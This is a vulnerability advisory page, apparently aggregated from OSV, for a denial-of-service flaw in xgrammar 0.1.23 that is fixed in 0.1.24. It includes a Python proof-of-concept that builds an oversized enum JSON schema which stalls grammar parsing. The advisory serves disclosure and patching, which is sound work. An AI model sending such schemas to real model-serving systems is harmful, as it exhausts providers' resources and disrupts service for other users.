🛡️ CVE-2025-58446 — xgrammar

🟠 CVSS 7.5 — High ⚠️ Exploit Public CWE-770 OSV
7.5
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

xgrammar vulnerable to denial of service by huge enum grammar

Summary

Provided grammar, would fit in a context window of most of the models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine so this seems to be a regression caused by Earley parser.

Details

Full reproducer provider in the POC section. The resulting grammar is around 70k tokens, and the grammar parsing itself (with the models I checked) was significantly longer than LLM processing itself, meaning this can be used to DOS model providers.

Patch

This problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only happens for very large grammars (>100k characters), like the below one. v0.1.24 solved this problem by optimizing the speed of the grammar optimizer and disable some slow optimization for large grammars.

Thanks to @Seven-Streams

PoC

```

import string

import random

def enum_schema(size=10000,str_len=10):

enum = {"enum": ["".join(random.choices(string.ascii_uppercase, k=str_len)) for _ in range(size)]}

schema = {

"definitions": {

"colorEnum": enum

},

"type": "object",

"properties": {

"color1": {

"$ref": "#/definitions/colorEnum"

},

"color2": {

"$ref": "#/definitions/colorEnum"

},

"color3": {

"$ref": "#/definitions/colorEnum"

},

"color4": {

"$ref": "#/definitions/colorEnum"

},

"color5": {

"$ref": "#/definitions/colorEnum"

},

"color6": {

"$ref": "#/definitions/colorEnum"

},

"color7": {

"$ref": "#/definitions/colorEnum"

},

"color8": {

"$ref": "#/definitions/colorEnum"

}

},

"required": [

"color1",

"color2"

]

}

return schema

schema_enum = enum_schema()

print(schema_enum)

print(test_schema(schema_enum, {}))

```

where:

```

def test_schema(schema, instance):

grammar = xgr.Grammar.from_json_schema(

json.dumps(schema),

strict_mode=True

)

return _is_grammar_accept_string(grammar, json.dumps(instance))

```

Impact

DOS

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs no privileges on the target. No user interaction is required. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality none, integrity none, availability low.

Weakness class

CVE-2025-58446 is classified as CWE-770: Allocation of Resources Without Limits. Resources are allocated on request with no cap, so a client can exhaust them.

Affected software

CVE-2025-58446 is recorded against 1 package.

  • xgrammar (from 0.1.23 up to 0.1.24)

Timeline and source

Published on 5 September 2025 and last revised on 7 July 2026. A public exploit is known to exist, which raises the urgency of patching considerably. A vendor advisory or fix has been published. Record sourced from OSV.

References

github.com (Web)
nvd.nist.gov (Advisory)
github.com (Web)
github.com (Package)

Details

Severity HIGH
CVSS Score 7.5
CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CWE CWE-770
Public Exploit ⚠️ Yes
Source OSV
Published 2025-09-05
Updated 2026-08-12
Modified 2026-07-07

Affected Packages

Software From version Fixed in
xgrammar 0.1.23 0.1.24

Similar Threats

Exploit Protection

Are you running xgrammar?

CVE-2025-58446 carries CVSS 7.5 High rating and a public exploit already exists. BotEraser checks your installation against this and other known CVE records, and blocks IPs associated with exploit activity.

Check My Site For CVE-2025-58446 →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.